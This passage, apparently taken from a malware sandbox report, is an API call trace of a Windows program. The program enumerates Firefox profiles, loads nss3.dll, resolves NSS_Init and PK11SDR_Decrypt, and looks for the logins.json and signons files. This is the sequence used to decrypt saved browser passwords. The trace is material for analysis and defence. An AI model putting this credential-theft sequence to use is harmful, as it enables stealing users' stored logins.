_Source="Mozilla\\Firefox" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox" [0067.714] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x3e [0067.714] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*", lpFindFileData=0x197e74 | out: lpFindFileData=0x197e74) returned 0x65f088 [0067.714] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x3e [0067.714] wcslen (_String=".") returned 0x1 [0067.714] wcscpy (in: _Dest=0x1980c4, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0067.714] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x3e [0067.714] wcscat (in: _Dest=0x1980c4, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0067.714] wcscat (in: _Dest=0x1980c4, _Source="." | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\.") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\." [0067.714] wcscmp (_String1=".", _String2="..") returned -1 [0067.714] wcscmp (_String1=".", _String2=".") returned 0 [0067.714] FindNextFileW (in: hFindFile=0x65f088, lpFindFileData=0x197e74 | out: lpFindFileData=0x197e74) returned 1 [0067.714] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x3e [0067.714] wcslen (_String="..") returned 0x2 [0067.714] wcscpy (in: _Dest=0x1980c4, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0067.714] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x3e [0067.714] wcscat (in: _Dest=0x1980c4, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0067.714] wcscat (in: _Dest=0x1980c4, _Source=".." | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\..") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\.." [0067.714] wcscmp (_String1="..", _String2="..") returned 0 [0067.714] FindNextFileW (in: hFindFile=0x65f088, lpFindFileData=0x197e74 | out: lpFindFileData=0x197e74) returned 1 [0067.714] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x3e [0067.714] wcslen (_String="8i341t8m.default") returned 0x10 [0067.714] wcscpy (in: _Dest=0x1980c4, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0067.714] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 0x3e [0067.714] wcscat (in: _Dest=0x1980c4, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0067.714] wcscat (in: _Dest=0x1980c4, _Source="8i341t8m.default" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default" [0067.714] wcscmp (_String1="8i341t8m.default", _String2="..") returned 1 [0067.714] wcscmp (_String1="8i341t8m.default", _String2=".") returned 1 [0067.714] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned 0x4f [0067.714] FindNextFileW (in: hFindFile=0x65f088, lpFindFileData=0x197e74 | out: lpFindFileData=0x197e74) returned 0 [0067.714] FindClose (in: hFindFile=0x65f088 | out: hFindFile=0x65f088) returned 1 [0067.714] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 0x3c [0067.714] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\*.*", lpFindFileData=0x197e74 | out: lpFindFileData=0x197e74) returned 0x65f088 [0067.715] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 0x3c [0067.715] wcslen (_String=".") returned 0x1 [0067.715] wcscpy (in: _Dest=0x1980c4, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles" [0067.715] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 0x3c [0067.715] wcscat (in: _Dest=0x1980c4, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\" [0067.715] wcscat (in: _Dest=0x1980c4, _Source="." | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\.") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\." [0067.715] wcscmp (_String1=".", _String2="..") returned -1 [0067.715] wcscmp (_String1=".", _String2=".") returned 0 [0067.715] FindNextFileW (in: hFindFile=0x65f088, lpFindFileData=0x197e74 | out: lpFindFileData=0x197e74) returned 1 [0067.715] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 0x3c [0067.715] wcslen (_String="..") returned 0x2 [0067.715] wcscpy (in: _Dest=0x1980c4, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles" [0067.715] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 0x3c [0067.715] wcscat (in: _Dest=0x1980c4, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\" [0067.715] wcscat (in: _Dest=0x1980c4, _Source=".." | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\..") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\.." [0067.715] wcscmp (_String1="..", _String2="..") returned 0 [0067.715] FindNextFileW (in: hFindFile=0x65f088, lpFindFileData=0x197e74 | out: lpFindFileData=0x197e74) returned 1 [0067.715] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 0x3c [0067.715] wcslen (_String="8i341t8m.default") returned 0x10 [0067.715] wcscpy (in: _Dest=0x1980c4, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles" [0067.715] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles") returned 0x3c [0067.715] wcscat (in: _Dest=0x1980c4, _Source="\\" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\" [0067.715] wcscat (in: _Dest=0x1980c4, _Source="8i341t8m.default" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default" [0067.715] wcscmp (_String1="8i341t8m.default", _String2="..") returned 1 [0067.715] wcscmp (_String1="8i341t8m.default", _String2=".") returned 1 [0067.715] wcslen (_String="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned 0x4d [0067.716] FindNextFileW (in: hFindFile=0x65f088, lpFindFileData=0x197e74 | out: lpFindFileData=0x197e74) returned 0 [0067.716] FindClose (in: hFindFile=0x65f088 | out: hFindFile=0x65f088) returned 1 [0067.716] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles.ini")) returned 0x20 [0067.716] wcscpy (in: _Dest=0x197db0, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" [0067.716] wcscpy (in: _Dest=0x197fba, _Source="General" | out: _Dest="General") returned="General" [0067.716] _snwprintf (in: _Dest=0x1981c4, _Count=0xff, _Format="Profile%d" | out: _Dest="Profile0") returned 8 [0067.716] wcscpy (in: _Dest=0x197fba, _Source="Profile0" | out: _Dest="Profile0") returned="Profile0" [0067.717] GetPrivateProfileStringW (in: lpAppName="Profile0", lpKeyName="Path", lpDefault="", lpReturnedString=0x1983c4, nSize=0x104, lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpReturnedString="Profiles/8i341t8m.default") returned 0x19 [0067.718] GetPrivateProfileIntW (lpAppName="Profile0", lpKeyName="IsRelative", nDefault=0, lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 0x1 [0067.719] _snwprintf (in: _Dest=0x1981c4, _Count=0xff, _Format="Profile%d" | out: _Dest="Profile1") returned 8 [0067.719] wcscpy (in: _Dest=0x197fba, _Source="Profile1" | out: _Dest="Profile1") returned="Profile1" [0067.719] GetPrivateProfileStringW (in: lpAppName="Profile1", lpKeyName="Path", lpDefault="", lpReturnedString=0x1983c4, nSize=0x104, lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpReturnedString="") returned 0x0 [0067.719] GetPrivateProfileIntW (lpAppName="Profile1", lpKeyName="IsRelative", nDefault=0, lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 0x0 [0067.720] _wcsicmp (_String1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned 6 [0067.720] _wcsicmp (_String1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", _String2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned 0 [0067.720] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Mozilla", ulOptions=0x0, samDesired=0x20019, phkResult=0x1982bc | out: phkResult=0x1982bc*=0x224) returned 0x0 [0067.720] RegEnumKeyExW (in: hKey=0x224, dwIndex=0x0, lpName=0x197e60, lpcchName=0x197430, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x197428 | out: lpName="Firefox", lpcchName=0x197430, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x197428) returned 0x0 [0067.720] _wcsnicmp (_String1="Firefox", _String2="mozilla", _MaxCount=0x7) returned -7 [0067.720] RegEnumKeyExW (in: hKey=0x224, dwIndex=0x1, lpName=0x197e60, lpcchName=0x197430, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x197428 | out: lpName="Mozilla Firefox", lpcchName=0x197430, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x197428) returned 0x0 [0067.720] _wcsnicmp (_String1="Mozilla", _String2="mozilla", _MaxCount=0x7) returned 0 [0067.720] _snwprintf (in: _Dest=0x197450, _Count=0x3ff, _Format="%s\\bin" | out: _Dest="Mozilla Firefox\\bin") returned 19 [0067.720] RegOpenKeyExW (in: hKey=0x224, lpSubKey="Mozilla Firefox\\bin", ulOptions=0x0, samDesired=0x20019, phkResult=0x197420 | out: phkResult=0x197420*=0x0) returned 0x2 [0067.720] RegEnumKeyExW (in: hKey=0x224, dwIndex=0x2, lpName=0x197e60, lpcchName=0x197430, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x197428 | out: lpName="Mozilla Firefox 53.0.3", lpcchName=0x197430, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x197428) returned 0x0 [0067.720] _wcsnicmp (_String1="Mozilla", _String2="mozilla", _MaxCount=0x7) returned 0 [0067.720] _snwprintf (in: _Dest=0x197450, _Count=0x3ff, _Format="%s\\bin" | out: _Dest="Mozilla Firefox 53.0.3\\bin") returned 26 [0067.720] RegOpenKeyExW (in: hKey=0x224, lpSubKey="Mozilla Firefox 53.0.3\\bin", ulOptions=0x0, samDesired=0x20019, phkResult=0x197420 | out: phkResult=0x197420*=0x220) returned 0x0 [0067.720] RegQueryValueExW (in: hKey=0x220, lpValueName="PathToExe", lpReserved=0x0, lpType=0x197404, lpData=0x198060, lpcbData=0x197408*=0x208 | out: lpType=0x197404*=0x1, lpData="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", lpcbData=0x197408*=0x66) returned 0x0 [0067.720] RegCloseKey (hKey=0x220) returned 0x0 [0067.721] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\nss3.dll")) returned 0x20 [0067.722] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll", lpFindFileData=0x196d70 | out: lpFindFileData=0x196d70) returned 0x65ec88 [0067.722] FindClose (in: hFindFile=0x65ec88 | out: hFindFile=0x65ec88) returned 1 [0067.722] CompareFileTime (lpFileTime1=0x1982b0, lpFileTime2=0x1982a8) returned 1 [0067.722] wcscpy (in: _Dest=0x197c50, _Source="C:\\Program Files (x86)\\Mozilla Firefox" | out: _Dest="C:\\Program Files (x86)\\Mozilla Firefox") returned="C:\\Program Files (x86)\\Mozilla Firefox" [0067.722] RegEnumKeyExW (in: hKey=0x224, dwIndex=0x3, lpName=0x197e60, lpcchName=0x197430, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x197428 | out: lpName="Mozilla Firefox 53.0.3", lpcchName=0x197430, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x197428) returned 0x103 [0067.722] RegCloseKey (hKey=0x224) returned 0x0 [0067.722] wcscpy (in: _Dest=0x1984e4, _Source="C:\\Program Files (x86)\\Mozilla Firefox" | out: _Dest="C:\\Program Files (x86)\\Mozilla Firefox") returned="C:\\Program Files (x86)\\Mozilla Firefox" [0067.722] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19a808 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0067.722] SetCurrentDirectoryW (lpPathName="C:\\Program Files (x86)\\Mozilla Firefox" (normalized: "c:\\program files (x86)\\mozilla firefox")) returned 1 [0067.722] GetModuleHandleW (lpModuleName="C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll") returned 0x0 [0067.873] LoadLibraryExW (lpLibFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll", hFile=0x0, dwFlags=0x8) returned 0x71390000 [0068.879] GetProcAddress (hModule=0x71390000, lpProcName="NSS_Init") returned 0x7141ee9a [0068.880] GetProcAddress (hModule=0x71390000, lpProcName="NSS_Shutdown") returned 0x7141f125 [0068.880] GetProcAddress (hModule=0x71390000, lpProcName="PK11_GetInternalKeySlot") returned 0x71442f61 [0068.880] GetProcAddress (hModule=0x71390000, lpProcName="PK11_FreeSlot") returned 0x714429d3 [0068.881] GetProcAddress (hModule=0x71390000, lpProcName="PK11_CheckUserPassword") returned 0x7142bc2d [0068.881] GetProcAddress (hModule=0x71390000, lpProcName="PK11_Authenticate") returned 0x7142bb28 [0068.881] GetProcAddress (hModule=0x71390000, lpProcName="PK11SDR_Decrypt") returned 0x7143ef47 [0068.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", cchWideChar=-1, lpMultiByteStr=0x199160, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", lpUsedDefaultChar=0x0) returned 80 [0068.881] NSS_Init () returned 0x0 [0069.193] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\logins.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\logins.json")) returned 0xffffffff [0069.193] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\signons.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\signons.sqlite")) returned 0xffffffff [0069.194] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\signons.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\signons.txt")) returned 0xffffffff [0069.194] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\signons2.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\signons2.txt")) returned 0xffffffff [0069.194] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\signons3.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\signons3.txt")) returned 0xffffffff [0069.194] NSS_Shutdown () returned 0x0 [0069.197] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0069.197] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Mozilla", ulOptions=0x0, samDesired=0x20019, phkResult=0x1982bc | out: phkResult=0x1982bc*=0x224) returned 0x0 [0069.197] RegEnumKeyExW (in: hKey=0x224, dwIndex=0x0, lpName=0x197e60, lpcchName=0x197430, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x197428 | out: lpName="Firefox", lpcchName=0x197430, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x197428) returned 0x0 [0069.197] _wcsnicmp (_String1="Firefox", _String2="mozilla", _MaxCount=0x7) returned -7 [0069.197] RegEnumKeyExW (in: hKey=0x224, dwIndex=0x1, lpName=0x197e60, lpcchName=0x197430, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x197428 | out: lpName="Mozilla Firefox", lpcchName=0x197430, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x197428) returned 0x0 [0069.197] _wcsnicmp (_String1="Mozilla", _String2="mozilla", _MaxCount=0x7) returned 0 [0069.197] _snwprintf (in: _Dest=0x197450, _Count=0x3ff, _Format="%s\\bin" | out: _Dest="Mozilla Firefox\\bin") returned 19 [0069.197] RegOpenKeyExW (in: hKey=0x224, lpSubKey="Mozilla Firefox\\bin", ulOptions=0x0, samDesired=0x20019, phkResult=0x197420 | out: phkResult=0x197420*=0x0) returned 0x2 [0069.197] RegEnumKeyExW (in: hKey=0x224, dwIndex=0x2, lpName=0x197e60, lpcchName=0x197430, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x197428 | out: lpName="Mozilla Firefox 53.0.3", lpcchName=0x197430, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x197428) returned 0x0 [0069.197] _wcsnicmp (_String1="Mozilla", _String2="mozilla", _MaxCount=0x7) returned 0 [0069.197] _snwprintf (in: _Dest=0x197450, _Count=0x3ff, _Format="%s\\bin" | out: _Dest="Mozilla Firefox 53.0.3\\bin") returned 26 [0069.197] RegOpenKeyExW (in: hKey=0x224, lpSubKey="Mozilla Firefox 53.0.3\\bin", ulOptions=0x0, samDesired=0x20019, phkResult=0x197420 | out: phkResult=0x197420*=0x260) returned 0x0 [0069.197] RegQueryValueExW (in: hKey=0x260, lpValueName="PathToExe", lpReserved=0x0, lpType=0x197404, lpData=0x198060, lpcbData=0x197408*=0x208 | out: lpType=0x197404*=0x1, lpData="C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", lpcbData=0x197408*=0x66) returned 0x0 [0069.197] RegCloseKey (hKey=0x260) returned 0x0 [0069.197] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\nss3.dll")) returned 0x20 [0069.198] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll", lpFindFileData=0x196d70 | out: lpFindFileData=0x196d70) returned 0x681df0 [0069.198] FindClose (in: hFindFile=0x681df0 | out: hFindFile=0x681df0) returned 1 [0069.198] CompareFileTime (lpFileTime1=0x1982b0, lpFileTime2=0x1982a8) returned 1 [0069.198] wcscpy (in: _Dest=0x197c50, _Source="C:\\Program Files (x86)\\Mozilla Firefox" | out: _Dest="C:\\Program Files (x86)\\Mozilla Firefox") returned="C:\\Program Files (x86)\\Mozilla Firefox" [0069.198] RegEnumKeyExW (in: hKey=0x224, dwIndex=0x3, lpName=0x197e60, lpcchName=0x197430, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x197428 | out: lpName="Mozilla Firefox 53.0.3", lpcchName=0x197430, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x197428) returned 0x103 [0069.198] RegCloseKey (hKey=0x224) returned 0x0 [0069.198] wcscpy (in: _Dest=0x1984e4, _Source="C:\\Program Files (x86)\\Mozilla Firefox" | out: _Dest="C:\\Program Files (x86)\\Mozilla Firefox") returned="C:\\Program Files (x86)\\Mozilla Firefox" [0069.198] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19a808 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0069.198] SetCurrentDirectoryW (lpPathName="C:\\Program Files (x86)\\Mozilla Firefox" (normalized: "c:\\program files (x86)\\mozilla firefox")) returned 1 [0069.198] GetModuleHandleW (lpModuleName="C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll") returned 0x71390000 [0069.200] GetProcAddress (hModule=0x71390000, lpProcName="NSS_Init") returned 0x7141ee9a [0069.200] GetProcAddress (hModule=0x71390000, lpProcName="NSS_Shutdown") returned 0x7141f125 [0069.200] GetProcAddress (hModule=0x71390000, lpProcName="PK11_GetInternalKeySlot") returned 0x71442f61 [0069.200] GetProcAddress (hModule=0x71390000, lpProcName="PK11_FreeSlot") returned 0x714429d3 [0069.200] GetProcAddress (hModule=0x71390000, lpProcName="PK11_CheckUserPassword") returned 0x7142bc2d [0069.200] GetProcAddress (hModule=0x71390000, lpProcName="PK11_Authenticate") returned 0x7142bb28 [0069.200] GetProcAddress (hModule=0x71390000, lpProcName="PK11SDR_Decrypt") returned 0x7143ef47 [0069.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", cchWideChar=-1, lpMultiByteStr=0x199160, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", lpUsedDefaultChar=0x0) returned 78 [0069.200] NSS_Init () returned 0xffffffff [0069.223] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0069.223] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224 [0069.226] Process32FirstW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0069.227] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x68, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0069.227] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0069.227] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0069.228] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0069.228] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0069.228] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x154) returned 0x0 [0069.228] Process32NextW (in: hSnapshot=0x224, lppe=0x198e10 | out: lppe=0x198e10*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x14c, 